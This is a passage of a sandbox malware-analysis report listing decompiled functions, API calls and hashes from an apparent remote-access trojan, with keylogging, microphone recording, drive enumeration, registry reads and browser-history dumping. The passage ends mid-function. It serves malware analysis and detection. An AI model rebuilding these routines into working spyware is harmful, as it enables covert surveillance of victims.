                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • Sleep.KERNEL32(000000FA,00463E44), ref: 00404118
                    Strings
                    • /sort "Visit Time" /stext ", xrefs: 00404092
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "
                    • API String ID: 368326130-1573945896
                    • Opcode ID: 2eac5f177e38ba3d5510b66f3c4a351a846c2765b6f392dade71e2eaa4fc0a08
                    • Instruction ID: 0b16387c6f9edcb84504e01d0cc383686463f04b1c5a299ba0a956b40ef645a0
                    • Opcode Fuzzy Hash: 2eac5f177e38ba3d5510b66f3c4a351a846c2765b6f392dade71e2eaa4fc0a08
                    • Instruction Fuzzy Hash: B7318431A0021957CB14FBA6DC969EE7779AF90308F40017FF506B71D2EF38598ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004503B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E004503B7(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E0044716D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x45e318;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x45e320;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043A382(_t23, _t23);
									goto L25;
								}
								if(E0044716D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















                    0x004503bc
                    0x004503bd
                    0x004503c0
                    0x004503c4
                    0x0045046a
                    0x0045047e
                    0x00450483
                    0x00450485
                    0x0045048b
                    0x0045048e
                    0x00450490
                    0x00450492
                    0x00450492
                    0x00450498
                    0x0045049d
                    0x0045049d
                    0x00450487
                    0x00450487
                    0x00000000
                    0x00450487
                    0x004503ca
                    0x004503cf
                    0x00000000
                    0x00000000
                    0x004503d5
                    0x004503da
                    0x004503dc
                    0x004503dc
                    0x004503e2
                    0x00000000
                    0x00000000
                    0x004503e7
                    0x004503fe
                    0x004503fe
                    0x00450407
                    0x00450409
                    0x00000000
                    0x00000000
                    0x0045040b
                    0x00450410
                    0x00450412
                    0x00450412
                    0x00450418
                    0x00000000
                    0x00000000
                    0x0045041d
                    0x0045043b
                    0x0045043b
                    0x0045043d
                    0x00450462
                    0x00000000
                    0x00450467
                    0x0045045a
                    0x00000000
                    0x00000000
                    0x0045045c
                    0x00000000
                    0x0045045c
                    0x0045041f
                    0x00450427
                    0x00000000
                    0x00000000
                    0x00450429
                    0x0045042c
                    0x00450432
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00450434
                    0x00450436
                    0x00450438
                    0x00450438
                    0x00000000
                    0x00450438
                    0x004503e9
                    0x004503f1
                    0x00000000
                    0x00000000
                    0x004503f3
                    0x004503f6
                    0x004503fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004503fc
                    0x00450402
                    0x00450404
                    0x00450404
                    0x00000000

                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450612,?,00000050,?,?,?,?,?), ref: 00450492
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                    • Instruction ID: b93994b24156d93d71cef3ddff737944661d95d4cf4e28bf2754044b1fc000f2
                    • Opcode Fuzzy Hash: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                    • Instruction Fuzzy Hash: 0521066AA00100A6DB34CA54C901B9B7356DF52B57F56842AEF0AD7303F73ADD4AC358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00404FD4(intOrPtr _a4) {
				char _v24;
				void* _v28;
				struct _SYSTEMTIME _v40;
				void* __ebx;
				void* __ebp;
				void* _t11;
				void* _t17;
				void* _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t42;
				void* _t43;

				if( *0x473544 == 0) {
					__eflags = 0;
					return 0;
				}
				_t36 = _a4;
				if( *0x470d48 == 0) {
					L7:
					 *0x473560 =  *0x473560 & 0x00000000;
					 *0x473565 = 1;
					 *0x47355c = _t36;
					return 1;
				}
				_t46 =  *0x473564;
				_t22 = "KeepAlive             | Enabled | Timeout: ";
				_t37 = "i";
				if( *0x473564 != 0) {
					GetLocalTime( &_v40);
					_t17 = E0041A6E9("KeepAlive             | Enabled | Timeout: ",  &_v24, _t36);
					_t42 = _t38 - 0x18;
					E004052DD(_t22, _t42, _t22, "i", _t46, _t17);
					_t43 = _t42 - 0x14;
					E00402073(_t22, _t43, _t22, "i", _t37);
					E0041A04A(_t22, _t35);
					_t38 = _t43 + 0x30;
					E00401FB8();
					 *0x473564 = 0;
				}
				if( *0x47355c != _t36) {
					_t48 =  *0x473565;
					if( *0x473565 != 0) {
						GetLocalTime( &_v40);
						_t11 = E0041A6E9(_t22,  &_v24, _t36);
						_t39 = _t38 - 0x18;
						E004052DD(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
						E00402073(_t22, _t39 - 0x14, _t22, _t37, _t37);
						E0041A04A(_t22, _t35);
						E00401FB8();
					}
				}
				goto L7;
			}















                    0x00404fe1
                    0x004050b9
                    0x00000000
                    0x004050b9
                    0x00404fee
                    0x00404ff2
                    0x004050a1
                    0x004050a1
                    0x004050aa
                    0x004050b1
                    0x00000000
                    0x004050b1
                    0x00404ff8
                    0x00404fff
                    0x00405004
                    0x00405009
                    0x00405010
                    0x0040501c
                    0x00405021
                    0x00405029
                    0x0040502e
                    0x00405034
                    0x00405039
                    0x0040503e
                    0x00405045
                    0x0040504a
                    0x0040504a
                    0x00405057
                    0x00405059
                    0x00405060
                    0x00405067
                    0x00405073
                    0x00405078
                    0x00405080
                    0x0040508b
                    0x00405090
                    0x0040509c
                    0x0040509c
                    0x00405060
                    0x00000000

                    APIs
                    • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405010
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405067
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    • Opcode ID: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                    • Instruction ID: 9a4cfd33936eaa6b36ea74c7cc729b7cf4cbb54b4ad27954b172034734b4d9a3
                    • Opcode Fuzzy Hash: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                    • Instruction Fuzzy Hash: AC2129719043806BD714FB25DC4575F7B54AB45309F04057EF485532A2DA3D5688CBEB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A04A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E0041A04A(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				void* __ebp;
				void* _t57;
				signed int _t58;
				struct _SYSTEMTIME* _t60;

				_t60 = (_t58 & 0xfffffff8) - 0x70;
				_t62 =  *0x470d48;
				if( *0x470d48 != 0) {
					GetLocalTime(_t60);
					_push(_v102 & 0x0000ffff);
					_push(_v104 & 0x0000ffff);
					_push(_v106 & 0x0000ffff);
					E00406874(_t62, E00401F8B(E00408832(__ebx,  &_v100, E00402EF0(__ebx,  &_v76, E00408832(__ebx,  &_v52, E004052FE( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
				}
				E00401FB8();
				return E00401FB8();
			}















                    0x0041a050
                    0x0041a053
                    0x0041a05a
                    0x0041a064
                    0x0041a073
                    0x0041a07e
                    0x0041a084
                    0x0041a0cf
                    0x0041a0db
                    0x0041a0e4
                    0x0041a0ed
                    0x0041a0f6
                    0x0041a0f6
                    0x0041a0fe
                    0x0041a10e

                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i
                    • API String ID: 481472006-2430845779
                    • Opcode ID: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                    • Instruction ID: 305aa241e5e1249f2c56a36f0bedab380cdf1516fdeeb0388db8af3b2f80b87a
                    • Opcode Fuzzy Hash: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                    • Instruction Fuzzy Hash: DD11637250820156C704FBA5D841CAFB3E8AF84348F504A3FF485A21E1EF3CD945CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004016EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E004016EF(signed int __ecx, unsigned int __edx, void* __edi, void* __esi, void* __ebp, char _a8) {
				signed int _v0;
				char _v20;
				void* __ebx;
				signed int _t19;
				signed int _t20;
				void* _t21;
				signed int _t29;
				unsigned int _t30;
				long _t37;
				signed int _t40;

				E00401FA0(0x472d74,  &_a8);
				_t29 = _v0;
				0x470aa8->wFormatTag = 1;
				_t19 = (__edx & 0x0000ffff) >> 3;
				asm("movd xmm0, edx");
				asm("cvtdq2pd xmm0, xmm0");
				 *0x470aac = _t29;
				 *0x470ab6 = __edx;
				_t30 = _t29 >> 0x1f;
				 *0x470aaa = __ecx;
				asm("addsd xmm0, [edx*8+0x46b1e0]");
				 *0x470ab0 = (__ecx & 0x0000ffff) * _t19 * _t29;
				_t37 = 0;
				 *0x470ab8 = 0;
				asm("cvtpd2ps xmm0, xmm0");
				 *0x470ab4 = (__edx >> 0x00000003 & 0x0000ffff) * (__ecx & 0x0000ffff);
				asm("mulss xmm0, [0x46b18c]");
				asm("cvttss2si eax, xmm0");
				_t20 = _t19 * 0;
				_t40 = _t20;
				 *0x470abc = 0;
				 *0x470a80 = _t20;
				waveInOpen(0x470ac8, 0xffffffff, 0x470aa8, 0x40184a, 0, 0x30008);
				do {
					E004017CC(_t37, _t30, _t40);
					_t37 = _t37 + 1;
				} while (_t37 < 2);
				waveInStart( *0x470ac8);
				_pop(_t21);
				return E004023AE(_t21,  &_v20, __ebp, 1, 0);
			}













                    0x00401700
                    0x00401705
                    0x0040170f
                    0x00401715
                    0x0040171e
                    0x00401722
                    0x00401726
                    0x0040172c
                    0x00401742
                    0x00401745
                    0x0040174c
                    0x00401755
                    0x0040175d
                    0x00401764
                    0x0040176a
                    0x00401780
                    0x00401787
                    0x0040178f
                    0x00401793
                    0x00401793
                    0x00401796
                    0x0040179b
                    0x004017a1
                    0x004017a7
                    0x004017a9
                    0x004017ae
                    0x004017af
                    0x004017ba
                    0x004017c6
                    0x00401fc1

                    APIs
                    • waveInOpen.WINMM(00470AC8,000000FF,00470AA8,0040184A,00000000,00030008,?), ref: 004017A1
                      • Part of subcall function 004017CC: waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                      • Part of subcall function 004017CC: waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                    • waveInStart.WINMM ref: 004017BA
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderOpenPrepareStart
                    • String ID: t-G
                    • API String ID: 4183526013-1680578370
                    • Opcode ID: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                    • Instruction ID: 95a711b6e76d91f395065626d5ac92766c974447fb9b8fe42a04c668eb71b703
                    • Opcode Fuzzy Hash: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                    • Instruction Fuzzy Hash: 1E110071A15310DEC359DB35AC40956B6E8EFAA365B10823BE04AE72F0E7384480C75C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407121 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407121(void* __ebx, void* __ecx, void* __edx, char _a4) {
				char _v8;
				char _v32;
				char _v56;
				char _v80;
				void* __edi;
				void* __esi;
				void* __ebp;
				CHAR* _t43;
				void* _t45;
				void* _t46;
				void* _t47;

				_t41 = __edx;
				_t28 = __ebx;
				_t45 = __ecx;
				E004020BF(__ebx, __ecx);
				_t1 =  &_a4; // 0x40793a
				_t30 = _t1;
				_t43 = E00401F8B(_t1);
				while( *_t43 != 0) {
					E00440751(_t30, GetDriveTypeA(_t43),  &_v8, 0xa);
					_t47 = _t47 + 0xc;
					_t41 = E00406292( &_v56, _t45, _t46, E00401F8B(E00402073(_t28,  &_v80, _t41, _t46,  &_v8)));
					E00401FC2(_t45, _t19, _t45, E00408853(_t28,  &_v32, _t19, _t43, _t46, __eflags, 0x2d));
					E00401FB8();
					E00401FB8();
					_t30 =  &_v80;
					E00401FB8();
					_t43 =  &(( &(_t43[1]))[lstrlenA(_t43)]);
					__eflags = _t43;
				}
				E00401FB8();
				return _t45;
			}














                    0x00407121
                    0x00407121
                    0x00407129
                    0x0040712b
                    0x00407130
                    0x00407130
                    0x00407138
                    0x004071a8
                    0x0040714a
                    0x0040714f
                    0x00407173
                    0x00407181
                    0x00407189
                    0x00407191
                    0x00407196
                    0x00407199
                    0x004071a6
                    0x004071a6
                    0x004071a6
                    0x004071b0
                    0x004071bc

                    APIs
                    • GetDriveTypeA.KERNEL32(00000000,?,0000000A,00472EC8,?), ref: 00407143
                    • lstrlenA.KERNEL32(00000000,00000000,0000002D), ref: 0040719F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DriveTypelstrlen
                    • String ID: :y@
                    • API String ID: 1700768220-1587296891
                    • Opcode ID: 563eb0879e7524069d83ee93026c2b57bc0f6a3de0865c919f7779aa4d97f8f5
                    • Instruction ID: c00c3adc2f199bda80f2beeafe438d8d3b09a9202e04ec6dc2608c4f95599cd9
                    • Opcode Fuzzy Hash: 563eb0879e7524069d83ee93026c2b57bc0f6a3de0865c919f7779aa4d97f8f5
                    • Instruction Fuzzy Hash: 1D018231E041096ACB04F7A5EC96EADB76C9F90344F50417FF406B21E1EF789A06C699
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B6DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0040B6DC(signed int __edx) {
				char _v8;
				void* __ecx;
				void* _t6;
				char _t15;

				_push(_t15);
				 *0x470b19 = _t15;
				 *0x470b28 = __edx * 0xea60;
				if(_t15 == 0) {
					L4:
					CreateThread(0, 0, E0040B586, 0, 0, 0);
					_t6 = 1;
				} else {
					_t26 = "FR";
					_v8 = 0;
					if(E004127E7(0x473238, E00401F8B(0x473238), "FR") == 0) {
						goto L4;
					} else {
						E00412831(E00401F8B(0x473238), _t26,  &_v8);
						if(_v8 == 0) {
							goto L4;
						} else {
							_t6 = 0;
						}
					}
				}
				return _t6;
			}







                    0x0040b6df
                    0x0040b6ea
                    0x0040b6f1
                    0x0040b6f8
                    0x0040b739
                    0x0040b743
                    0x0040b749
                    0x0040b6fa
                    0x0040b6fa
                    0x0040b6ff
                    0x0040b719
                    0x00000000
                    0x0040b71b
                    0x0040b729
                    0x0040b733
                    0x00000000
                    0x0040b735
                    0x0040b735
                    0x0040b735
                    0x0040b733
                    0x0040b719
                    0x0040b751

                    APIs
                    • CreateThread.KERNEL32 ref: 0040B743
                      • Part of subcall function 004127E7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                      • Part of subcall function 004127E7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                      • Part of subcall function 004127E7: RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                      • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                      • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                      • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue$CreateThread
                    • String ID: 82G$Cqt
                    • API String ID: 3520877709-164559435
                    • Opcode ID: dc57b3553d00011a6539e045a5677cc24a5fd93cd8f6676a456d400a4c8e839b
                    • Instruction ID: aa30cb8e898e471b953b87efe3deb9bdc24ff20182dd0f4763c4c7706c19c14b
                    • Opcode Fuzzy Hash: dc57b3553d00011a6539e045a5677cc24a5fd93cd8f6676a456d400a4c8e839b
                    • Instruction Fuzzy Hash: 8CF0F93070221477C7105B666C858EBBB9DCE83B65310407FF805A7381DB799E4642FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E00419872(void* __ebx) {
				char _v28;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t36;
				signed int _t37;
				void* _t39;

				_t39 = (_t37 & 0xfffffff8) - 0x1c;
				E0040CEEC( &_v28, 0x30, "alarm.wav");
				if(PathFileExistsW(E00401EE4( &_v28)) != 0) {
					L7:
					E0041991B(E00401EE4( &_v28));
				} else {
					if(E00405AE5(0x464074) == 0) {
						E0041AE6B(0x4738b8, E00401EE4( &_v28));
						goto L7;
					} else {
						_t43 =  *0x472aca;
						_t28 = _t39 - 0x18;
						_push(0x46a8dc);
						if( *0x472aca == 0) {
							E00402073(__ebx, _t28, 0x464074, _t36);
							_t29 = 0x4734e8;
						} else {
							E00402073(__ebx, _t28, 0x464074, _t36);
							_t29 = 0x4738d0;
						}
						_push(0xa1);
						E00404A81(_t29, 0x464074, _t43);
					}
				}
				return E00401EE9();
			}










                    0x00419878
                    0x00419887
                    0x0041989f
                    0x004198fd
                    0x00419908
                    0x004198a1
                    0x004198b4
                    0x004198f8
                    0x00000000
                    0x004198b6
                    0x004198b9
                    0x004198c0
                    0x004198c2
                    0x004198c7
                    0x004198d5
                    0x004198da
                    0x004198c9
                    0x004198c9
                    0x004198ce
                    0x004198ce
                    0x004198df
                    0x004198e4
                    0x004198e4
                    0x004198b4
                    0x0041991a

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415F1F,00000000), ref: 00419897
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: alarm.wav$4G
                    • API String ID: 1174141254-2977537865
                    • Opcode ID: fcfce67ce7ff89bdba8d960ccae3216dfcaaf3815331e03428f67ddc019dfb48
                    • Instruction ID: 34e28ac8ce078d76f0f9f0665c2abcaeee574b9cd4657200da68d7dd76b5aff6
                    • Opcode Fuzzy Hash: fcfce67ce7ff89bdba8d960ccae3216dfcaaf3815331e03428f67ddc019dfb48
                    • Instruction Fuzzy Hash: 2001C020B1420056CA14FA76D8666EE26859B81358F00417FF819662E2EF7D4D85D2DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A5C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E0040A5C4(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
				char _v28;
				void* __edi;
				void* __ebp;
				struct HHOOK__** _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t37 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				E00402073(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
				E0041A7B9(_t32 - 0x18,  &_v28);
				E0040A6DA(__ebx, _t30, _t37);
				E00401FB8();
				E00402073(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
				E00402073(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
				E0041A04A(__ebx, "Online Keylogger Stopped");
				_t30[0x12] = 0;
				CloseHandle(_t30[0xf]);
				if(_t30[0x12] == 0 &&  *_t30 != 0) {
					UnhookWindowsHookEx( *_t30);
					 *_t30 =  *_t30 & 0x00000000;
				}
				return 1;
			}









                    0x0040a5cb
                    0x0040a5ce
                    0x0040a5d2
                    0x0040a647
                    0x00000000
                    0x0040a647
                    0x0040a5dd
                    0x0040a5ea
                    0x0040a5f1
                    0x0040a5f9
                    0x0040a604
                    0x0040a613
                    0x0040a618
                    0x0040a620
                    0x0040a627
                    0x0040a631
                    0x0040a63a
                    0x0040a640
                    0x0040a640
                    0x00000000

                    APIs
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • CloseHandle.KERNEL32(?), ref: 0040A627
                    • UnhookWindowsHookEx.USER32 ref: 0040A63A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    • Opcode ID: 0fd4069c71e66b082cb6e77da85a8f995c278d86a89dabb762f81578838a1475
                    • Instruction ID: 152bd68872477db56328b5f984a61734b927b4b139483ca97bc76b34e3d0b4bf
                    • Opcode Fuzzy Hash: 0fd4069c71e66b082cb6e77da85a8f995c278d86a89dabb762f81578838a1475
                    • Instruction Fuzzy Hash: 7301F531A043005BD7217B65D80BBBE7B755B41305F44046FE581222D2EBBA19A6D7DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004017CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004017CC(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				long _t10;
				signed int _t17;
				struct wavehdr_tag* _t25;

				_t28 = __eflags;
				E00401E45(0x472d34, __edx, 0x472d34, __eflags, __ecx);
				E00401F7D( *0x470a80);
				_t17 = __ecx << 5;
				_t25 =  *0x472d70 + _t17;
				_t25->lpData = E00401F8B(E00401E45(0x472d34, __edx, 0x472d34, _t28, __ecx));
				_t10 =  *0x470a80; // 0x0
				_t25->dwBufferLength = _t10;
				_t25->dwBytesRecorded = 0;
				_t25->dwUser = 0;
				_t25->dwFlags = 0;
				_t25->dwLoops = 0;
				waveInPrepareHeader( *0x470ac8, _t25, 0x20);
				return waveInAddBuffer( *0x470ac8,  *0x472d70 + _t17, 0x20);
			}







                    0x004017cc
                    0x004017e0
                    0x004017e7
                    0x004017f4
                    0x004017fa
                    0x00401808
                    0x0040180a
                    0x0040180f
                    0x00401817
                    0x0040181a
                    0x0040181d
                    0x00401820
                    0x00401829
                    0x00401849

                    APIs
                    • waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: 4-G
                    • API String ID: 2315374483-347150978
                    • Opcode ID: d66115f22d49b23d1b184589ca0b9179fa17379b2301c72a8eda41a9a70bd51b
                    • Instruction ID: 6b7ed70fd603f0a3b73b27032148b84c73c10b4b752733d916ddca8c7a8238c5
                    • Opcode Fuzzy Hash: d66115f22d49b23d1b184589ca0b9179fa17379b2301c72a8eda41a9a70bd51b
                    • Instruction Fuzzy Hash: B201AD71302300AFC7509F35EC4492ABBA9FB89305B01413AF809C37A2EB7998508B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00447366 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 29%
                    			E00447366(void* __ecx, void* __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46f00c; // 0x54ba778e
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = E00446D4A(0x15, "IsValidLocaleName", 0x45d1a8, "IsValidLocaleName");
				if(_t18 == 0) {
					_t3 =  &_a4; // 0x4433eb
					IsValidLocale(E004474BB(_t13, _t18, __eflags,  *_t3, 0), 1);
				} else {
